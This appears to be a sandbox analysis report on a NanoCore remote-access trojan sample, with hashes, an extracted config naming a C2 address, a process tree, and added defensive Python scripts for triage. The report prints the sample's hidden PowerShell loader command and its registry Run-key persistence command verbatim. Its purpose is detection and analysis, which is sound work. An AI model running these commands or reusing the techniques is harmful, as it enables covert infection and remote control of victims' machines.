Analysis
-
max time kernel
118s
-
max time network
119s
-
platform
windows7_x64
-
resource
win7-20240221-en
-
resource tags
arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
-
submitted
16-05-2024 13:37
Static task
static1
Behavioral task
behavioral1
Sample
e0dfee6241128b7395b5fd0d8f6ebe20_NeikiAnalytics.exe
Resource
win7-20240221-en
General
-
Target
e0dfee6241128b7395b5fd0d8f6ebe20_NeikiAnalytics.exe
-
Size
689KB
-
MD5
e0dfee6241128b7395b5fd0d8f6ebe20
-
SHA1
a1351dfa6c71e46c155f43e91538af2ababa5c5a
-
SHA256
a7904a9abf1b208434c7e06b7d7c0d86ff150660b436eebd5d2a837c1bc51e21
-
SHA512
06c609efa598c9df65cd2339dfa96d66658030fe9066daa7936a93de36c9026d822a7692f90e94b107b5fd7c6744091d7de5d943289f9078fa4aff44ca08e3b2
-
SSDEEP
12288:BEwtNzCu2HjdSqvXO6KoDP46aJkOReOjDSIWzRgmYW9+:6y/2DB+8XfORecSISRNYW9+
Malware Config
Extracted
family nanocore
version 1.2.2.0
c2 184.75.223.235:7425
mutex 08ef4235-7a50-4f21-9618-7cf8d1e59e43
-
activate_away_mode
true
-
backup_connection_host
-
backup_dns_server
8.8.4.4
-
buffer_size
65535
-
build_time
2024-02-09T12:58:05.780785736Z
-
bypass_user_account_control
false
-
bypass_user_account_control_data
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
-
clear_access_control
true
-
clear_zone_identifier
false
-
connect_delay
4000
-
connection_port
7425
-
default_group
Default
-
enable_debug_mode
true
-
gc_threshold
10485760 (1.048576e+07 bytes, 10 MiB)
-
keep_alive_timeout
30000
-
keyboard_logging
false
-
lan_timeout
2500
-
max_packet_size
10485760 (1.048576e+07 bytes, 10 MiB)
-
mutex
08ef4235-7a50-4f21-9618-7cf8d1e59e43
-
mutex_timeout
5000
-
prevent_system_sleep
false
-
primary_connection_host
184.75.223.235
-
primary_dns_server
8.8.8.8
-
request_elevation
true
-
restart_delay
5000
-
run_delay
0
-
run_on_startup
false
-
set_critical_process
true
-
timeout_interval
5000
-
use_custom_dns_server
false
-
version
1.2.2.0
-
wan_timeout
8000
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Adds Run key to start application 2 TTPs 2 IoCs
Processes: reg.exe, ImagingDevices.exe
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\Run\Dveskolen = "%Shoresman% -windowstyle minimized $Devoto=(Get-ItemProperty -Path 'HKCU:\\Ionized\\').Arbejdspligt;%Shoresman% ($Devoto)" (reg.exe)
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\DHCP Host = "C:\\Program Files (x86)\\DHCP Host\\dhcphost.exe" (ImagingDevices.exe)
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
Processes: ImagingDevices.exe
PID 2552 ImagingDevices.exe
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes: powershell.exe, ImagingDevices.exe
PID 2904 powershell.exe
PID 2552 ImagingDevices.exe
-
Suspicious use of SetThreadContext 1 IoCs
Processes: powershell.exe
PID 2904 powershell.exe set thread context of PID 2552 ImagingDevices.exe
-
Drops file in Program Files directory 2 IoCs
Processes: ImagingDevices.exe
File created C:\Program Files (x86)\DHCP Host\dhcphost.exe (ImagingDevices.exe)
File opened for modification C:\Program Files (x86)\DHCP Host\dhcphost.exe (ImagingDevices.exe)
-
Drops file in Windows directory 1 IoCs
Processes: e0dfee6241128b7395b5fd0d8f6ebe20_NeikiAnalytics.exe
File opened for modification C:\Windows\Ligaturers216\irkas.unm (e0dfee6241128b7395b5fd0d8f6ebe20_NeikiAnalytics.exe)
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes: schtasks.exe, schtasks.exe
PID 1652 schtasks.exe
PID 2256 schtasks.exe
-
Modifies registry key 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes: powershell.exe
PID 2904 powershell.exe (6 events)
-
Suspicious behavior: MapViewOfSection 1 IoCs
Processes: powershell.exe
PID 2904 powershell.exe
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes: powershell.exe
Token: SeDebugPrivilege PID 2904 powershell.exe
-
Suspicious use of WriteProcessMemory 30 IoCs
Processes: e0dfee6241128b7395b5fd0d8f6ebe20_NeikiAnalytics.exe, powershell.exe, ImagingDevices.exe, cmd.exe
PID 2240 e0dfee6241128b7395b5fd0d8f6ebe20_NeikiAnalytics.exe wrote to memory of PID 2904 powershell.exe (4 events)
PID 2904 powershell.exe wrote to memory of PID 2584 cmd.exe (4 events)
PID 2904 powershell.exe wrote to memory of PID 2552 ImagingDevices.exe (6 events)
PID 2552 ImagingDevices.exe wrote to memory of PID 2492 cmd.exe (4 events)
PID 2492 cmd.exe wrote to memory of PID 2424 reg.exe (4 events)
PID 2552 ImagingDevices.exe wrote to memory of PID 2256 schtasks.exe (4 events)
PID 2552 ImagingDevices.exe wrote to memory of PID 1652 schtasks.exe (4 events)
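The two persistence mechanisms above (a REG_EXPAND_SZ Run value that expands an attacker-defined %Shoresman% variable and pulls script text from HKCU:\Ionized, plus two scheduled tasks imported from .tmp XML files in the user's Temp directory) can be hunted for with a few registry and command-line checks. The following is an added triage script written for this page, not tooling from the sandbox or from the sample; the two Run values and two schtasks lines are copied from the report, the OneDrive Run value and the "Backup" task are constructed benign entries for contrast, and the list of standard environment variables is an assumption to tune per estate.

```python
"""Triage checks for Run-key script loaders and schtasks /xml persistence.

Added example for this report; not sandbox or sample code. Records are
constructed in the shape of the report's IoCs (plus two benign entries).
"""
import re

# (key\value, type, data). First two copied from the "Adds Run key" IoCs.
RUN_VALUES = [
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Dveskolen", "REG_EXPAND_SZ",
     r"%Shoresman% -windowstyle minimized $Devoto=(Get-ItemProperty -Path 'HKCU:\Ionized\').Arbejdspligt;%Shoresman% ($Devoto)"),
    (r"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\DHCP Host", "REG_SZ",
     r"C:\Program Files (x86)\DHCP Host\dhcphost.exe"),
    # constructed benign entry
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive", "REG_SZ",
     r'"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
]

# First two copied from the process tree; the third is a constructed benign task.
TASK_CMDLINES = [
    r'"schtasks.exe" /create /f /tn "DHCP Host" /xml "C:\Users\Admin\AppData\Local\Temp\tmp49FD.tmp"',
    r'"schtasks.exe" /create /f /tn "DHCP Host Task" /xml "C:\Users\Admin\AppData\Local\Temp\tmp4A5C.tmp"',
    r'schtasks.exe /create /tn "Backup" /xml "C:\ProgramData\Backup\task.xml"',
]

# Assumption: variables a legitimate Run value may expand. Anything else in a
# REG_EXPAND_SZ value was defined by whoever wrote the key.
STANDARD_ENV = {"SYSTEMROOT", "WINDIR", "SYSTEMDRIVE", "PROGRAMFILES", "PROGRAMFILES(X86)",
                "PROGRAMDATA", "APPDATA", "LOCALAPPDATA", "USERPROFILE", "PUBLIC",
                "TEMP", "TMP", "COMSPEC"}

SCRIPT_TEXT = re.compile(r"-windowstyle|Get-ItemProperty|\$\w+\s*=|-enc(?:odedcommand)?\b", re.I)
HIVE_PATH = re.compile(r"HK(?:CU|LM):\\([^'\"\s]+)", re.I)


def check_run_value(key, vtype, data):
    """Return the reasons a Run value looks like a script-in-registry loader."""
    reasons = []
    if vtype == "REG_EXPAND_SZ":
        for var in sorted(set(re.findall(r"%([^%\s]+)%", data))):
            if var.upper() not in STANDARD_ENV:
                reasons.append(f"expands non-standard variable %{var}%")
    if SCRIPT_TEXT.search(data):
        reasons.append("value holds PowerShell script text rather than a file path")
    m = HIVE_PATH.search(data)
    if m and not m.group(1).lower().startswith("software\\"):
        reasons.append(f"reads payload from unusual registry path {m.group(0)}")
    return reasons


def check_schtasks(cmdline):
    """Flag /create with a task definition imported from a temp file."""
    reasons = []
    m = re.search(r'/xml\s+(?:"([^"]+)"|(\S+))', cmdline, re.I)
    if m and re.search(r"/create", cmdline, re.I):
        xml = m.group(1) or m.group(2)
        if re.search(r"\\AppData\\Local\\Temp\\", xml, re.I) or xml.lower().endswith(".tmp"):
            reasons.append(f"task definition imported from temp file {xml}")
    return reasons


def triage(run_values=RUN_VALUES, task_cmdlines=TASK_CMDLINES):
    """Map each suspicious record to its reasons; clean records are omitted."""
    findings = {}
    for key, vtype, data in run_values:
        r = check_run_value(key, vtype, data)
        if r:
            findings[key] = r
    for cmd in task_cmdlines:
        r = check_schtasks(cmd)
        if r:
            findings[cmd] = r
    return findings


if __name__ == "__main__":
    for record, reasons in triage().items():
        print(record)
        for why in reasons:
            print("   ", why)
```

The "DHCP Host" Run value is not flagged by these checks: on its own it is an ordinary path. Its signal in this report is the adjacent evidence (the same ImagingDevices.exe process dropped dhcphost.exe into a new Program Files directory and registered two tasks of the same name from Temp). Where %Shoresman% is defined is not shown in the report; on a live host, check HKCU\Environment and the HKCU\Ionized key the Run value reads from.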
Processes
-
Process tree (depth in brackets; PIDs taken from the WriteProcessMemory entries above, the two schtasks.exe instances are PIDs 2256 and 1652):

[1] C:\Users\Admin\AppData\Local\Temp\e0dfee6241128b7395b5fd0d8f6ebe20_NeikiAnalytics.exe (PID 2240)
    Command line: "C:\Users\Admin\AppData\Local\Temp\e0dfee6241128b7395b5fd0d8f6ebe20_NeikiAnalytics.exe"
    - Drops file in Windows directory
    - Suspicious use of WriteProcessMemory
    [2] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 2904)
        Command line: "powershell.exe" -windowstyle hidden "$Hndelig=Get-Content 'C:\Users\Admin\AppData\Roaming\archprimate\sensationslysten\rippon.Ion';$Geocyclic=$Hndelig.SubString(53435,3);.$Geocyclic($Hndelig)"
        - Command and Scripting Interpreter: PowerShell
        - Suspicious use of NtSetInformationThreadHideFromDebugger
        - Suspicious use of SetThreadContext
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious behavior: MapViewOfSection
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
        [3] C:\Windows\SysWOW64\cmd.exe (PID 2584)
            Command line: "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
        [3] C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe (PID 2552)
            Command line: "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
            - Adds Run key to start application
            - Suspicious use of NtCreateThreadExHideFromDebugger
            - Suspicious use of NtSetInformationThreadHideFromDebugger
            - Drops file in Program Files directory
            - Suspicious use of WriteProcessMemory
            [4] C:\Windows\SysWOW64\cmd.exe (PID 2492)
                Command line: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Dveskolen" /t REG_EXPAND_SZ /d "%Shoresman% -windowstyle minimized $Devoto=(Get-ItemProperty -Path 'HKCU:\Ionized\').Arbejdspligt;%Shoresman% ($Devoto)"
                - Suspicious use of WriteProcessMemory
                [5] C:\Windows\SysWOW64\reg.exe (PID 2424)
                    Command line: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Dveskolen" /t REG_EXPAND_SZ /d "%Shoresman% -windowstyle minimized $Devoto=(Get-ItemProperty -Path 'HKCU:\Ionized\').Arbejdspligt;%Shoresman% ($Devoto)"
                    - Adds Run key to start application
                    - Modifies registry key
            [4] C:\Windows\SysWOW64\schtasks.exe
                Command line: "schtasks.exe" /create /f /tn "DHCP Host" /xml "C:\Users\Admin\AppData\Local\Temp\tmp49FD.tmp"
                - Creates scheduled task(s)
            [4] C:\Windows\SysWOW64\schtasks.exe
                Command line: "schtasks.exe" /create /f /tn "DHCP Host Task" /xml "C:\Users\Admin\AppData\Local\Temp\tmp4A5C.tmp"
                - Creates scheduled task(s)
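The powershell.exe stage above reads rippon.Ion, takes three characters at offset 53435 (close to the end of a file the report lists as 52KB) and uses the dot operator to invoke whatever those characters name, passing the whole file as the argument. When the three characters are `iex`, that is Invoke-Expression over the entire blob, so the file itself is the next-stage script. The script below is an added example written for this page, not sandbox or sample code: it parses the recorded command line for the path, offset and length, then performs the unwrap statically, returning the verb and the stage text instead of executing it. The contents of rippon.Ion are not on this page, so `build_demo_blob` constructs a stand-in with the verb at the recorded offset.

```python
"""Static unwrap of the `.$verb($blob)` PowerShell loader stage.

Added example for this report; not sandbox or sample code. The real
rippon.Ion is not available here, so a constructed blob stands in for it.
"""
import re

# Loader command line exactly as recorded in the report's process tree.
LOADER_CMDLINE = r'''"powershell.exe" -windowstyle hidden "$Hndelig=Get-Content 'C:\Users\Admin\AppData\Roaming\archprimate\sensationslysten\rippon.Ion';$Geocyclic=$Hndelig.SubString(53435,3);.$Geocyclic($Hndelig)"'''

LOADER_RE = re.compile(
    r"Get-Content\s+'(?P<path>[^']+)'"                          # file holding the blob
    r".*?\.SubString\((?P<off>\d+)\s*,\s*(?P<len>\d+)\)",        # where the verb is cut from
    re.IGNORECASE | re.DOTALL,
)

# Names the dot operator would resolve to Invoke-Expression.
IEX_NAMES = {"iex", "invoke-expression"}


def parse_loader(cmdline):
    """Return (blob_path, offset, length) for this loader shape, else None."""
    m = LOADER_RE.search(cmdline)
    if not m:
        return None
    return m.group("path"), int(m.group("off")), int(m.group("len"))


def unwrap_stage(blob, offset, length):
    """Do what `.$verb($blob)` would do, minus the execution.

    Returns the verb the loader would invoke, whether it is Invoke-Expression,
    and (in that case) the stage text, which is the whole blob.
    """
    verb = blob[offset:offset + length]
    if len(verb) != length:
        raise ValueError(
            f"blob is {len(blob)} chars, offset {offset} is past its end: wrong or truncated file")
    is_iex = verb.strip().lower() in IEX_NAMES
    return {"verb": verb, "invokes_expression": is_iex, "stage": blob if is_iex else None}


def build_demo_blob(offset=53435):
    """Constructed stand-in for rippon.Ion: comment filler up to the offset,
    the verb `IEX` at the offset, then a harmless script body."""
    head = "<# " + "junk" * ((offset - 3) // 4)
    head = head.ljust(offset, "#")          # pad so the verb starts exactly at `offset`
    return head + "IEX" + " #>\n$c2 = 'demo'; Write-Output $c2\n"


if __name__ == "__main__":
    path, off, ln = parse_loader(LOADER_CMDLINE)
    # On a triage box: blob = open(path, encoding="utf-8", errors="replace").read()
    blob = build_demo_blob(off)
    result = unwrap_stage(blob, off, ln)
    print(f"{path} offset={off} len={ln} verb={result['verb']!r} iex={result['invokes_expression']}")
    if result["stage"]:
        print("stage length:", len(result["stage"]))
```

Get-Content without -Raw yields one string per line, so if the real file is not a single line, apply the offset check to each line rather than to the joined text. Save the returned stage to disk for deobfuscation; do not pipe it back into PowerShell, since the 16.4MB region later written into ImagingDevices.exe is what that stage produces.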
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
-
C:\Users\Admin\AppData\Local\Temp\tmp49FD.tmp
Filesize
1KB
MD5
71ead0a0a3d5f5ab1c6fe7e937fbb0a7
SHA1
5ce6d119d57d1e536f5f8fe9b88e84bff5bc65f4
SHA256
320e3d1c9de524bd09da80c102590ca1de02878947a5bd9cf6ce41ec80d627ef
SHA512
5ff26e793041c37dee51b336e4b82bfc42b5a132b5a1bb975c7e201bedb3a384f3c44ed560b800a0b0830d2eaebd671288ab47f06cfe553da5a99b29ebeab3d0
-
C:\Users\Admin\AppData\Local\Temp\tmp4A5C.tmp
Filesize
1KB
MD5
0479d5f304ef2d7e3c15fb24a99f88c1
SHA1
8edbb1450a656fac5f5e96779ffe440ee8c1aec9
SHA256
112557c2b2d0c669a3b115129dc32f005341e965330fa8f2ad3e5de1926594bc
SHA512
537e8d87e5cd975f0e69bb145f81d6e9d7b0d82eed143ac351304ea38577137386a51fdb7357ec6d641eb04ff5f51e249bba2db8a4b5bf2934d561394a4a3f15
-
C:\Users\Admin\AppData\Roaming\archprimate\sensationslysten\Appliceringernes.Bra
Filesize
327KB
MD5
3b52e8ccc5c3e79f2c3bd9878f7c72bd
SHA1
d341fa8bdab55d08c942d45bd0cd2cf11d5b26e4
SHA256
c5426f693d6484c5e42a66d03f3422587a4b328dc8432f305458d1e0f3e1ee78
SHA512
6c78f6d5f1e5e4f983718e78fca14bab3e17c753cabe36c2f4e95be0406acdd32d980e2328640acb9eba439c26b5d268a1fbcfc3b4d5abf7970064f5b286dd19
-
C:\Users\Admin\AppData\Roaming\archprimate\sensationslysten\rippon.Ion
Filesize
52KB
MD5
1067aadf3627bd86f4048db52f577636
SHA1
682d902c4223a31fb3abf3236194b177813d662f
SHA256
0b4823813f85cbf0259d04a24fa6ee9dc00c612896201fdf1793928a3883c0d4
SHA512
d9331366473d373535cca3db7b364fe3371cdef889be61cd052249ee42d1d1aae8da696dc88e2094bfda8eda2cda1b6da36e16cf5e5f92d66296941ec6aca377
-
memory/2552-30-0x0000000000980000-0x00000000019E2000-memory.dmp
Filesize
16.4MB
-
memory/2552-32-0x0000000000980000-0x00000000009BA000-memory.dmp
Filesize
232KB
-
memory/2552-40-0x000000001DC10000-0x000000001DC1A000-memory.dmp
Filesize
40KB
-
memory/2904-8-0x00000000065B0000-0x00000000071C5000-memory.dmp
Filesize
12.1MB
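The memory dump names above encode PID, dump index and the virtual address range of each region, and three of the four come from PID 2552, the ImagingDevices.exe process that powershell.exe 2904 wrote into six times before calling SetThreadContext on it. Those regions are the ones to open first, since after a thread-context change the written region is what actually runs. The script below is an added example for this page, not sandbox tooling: it parses the dump names, recomputes the sizes with the report's own rounding, marks dumps belonging to a SetThreadContext target, and notes when a later dump lies inside an earlier one from the same process. Dump names and the injection pair are copied from the report; nothing else is assumed.

```python
"""Parse sandbox memory dump names and mark dumps from the injection target.

Added example for this report; not sandbox code. Dump names are copied from
the Downloads list, the injection pair from the SetThreadContext signature.
"""
import re

DUMP_RE = re.compile(
    r"memory/(?P<pid>\d+)-(?P<idx>\d+)-0x(?P<start>[0-9A-Fa-f]+)-0x(?P<end>[0-9A-Fa-f]+)-memory\.dmp"
)

DUMPS = [
    "memory/2552-30-0x0000000000980000-0x00000000019E2000-memory.dmp",
    "memory/2552-32-0x0000000000980000-0x00000000009BA000-memory.dmp",
    "memory/2552-40-0x000000001DC10000-0x000000001DC1A000-memory.dmp",
    "memory/2904-8-0x00000000065B0000-0x00000000071C5000-memory.dmp",
]

# (source pid, target pid): "PID 2904 powershell.exe set thread context of 2552 ImagingDevices.exe"
INJECTIONS = [(2904, 2552)]


def human_size(n):
    """Same rounding the report uses: whole KB below 1 MiB, one decimal MB above."""
    return f"{n / 2**20:.1f}MB" if n >= 2**20 else f"{n // 1024}KB"


def parse_dump_name(name):
    """Split a dump file name into pid, index and address range (sizes in bytes)."""
    m = DUMP_RE.fullmatch(name.strip())
    if not m:
        raise ValueError(f"not a sandbox memory dump name: {name!r}")
    start, end = int(m["start"], 16), int(m["end"], 16)
    if end <= start:
        raise ValueError(f"region end precedes start in {name!r}")
    return {"name": name, "pid": int(m["pid"]), "index": int(m["idx"]),
            "start": start, "end": end, "size": end - start}


def triage_dumps(names=DUMPS, injections=INJECTIONS):
    """Annotate each dump with its size, whether its process was a
    SetThreadContext target, and which earlier dumps of the same process contain it."""
    targets = {target for _, target in injections}
    rows = []
    for name in names:
        d = parse_dump_name(name)
        d["size_h"] = human_size(d["size"])
        d["injection_target"] = d["pid"] in targets
        d["nested_in"] = [r["index"] for r in rows
                          if r["pid"] == d["pid"] and r["start"] <= d["start"] and d["end"] <= r["end"]]
        rows.append(d)
    return rows


if __name__ == "__main__":
    for r in triage_dumps():
        flag = "TARGET" if r["injection_target"] else "      "
        print(f"{flag} pid={r['pid']} #{r['index']:<3} {r['start']:#011x}-{r['end']:#011x} "
              f"{r['size_h']:>7} nested_in={r['nested_in']}")
```

Dump 32 is the first 232KB of the same 0x980000 base that dump 30 covers in full, which makes the pair a natural before/after view of that region; dump 8 belongs to powershell.exe itself and is where the unwrapped stage lived before injection.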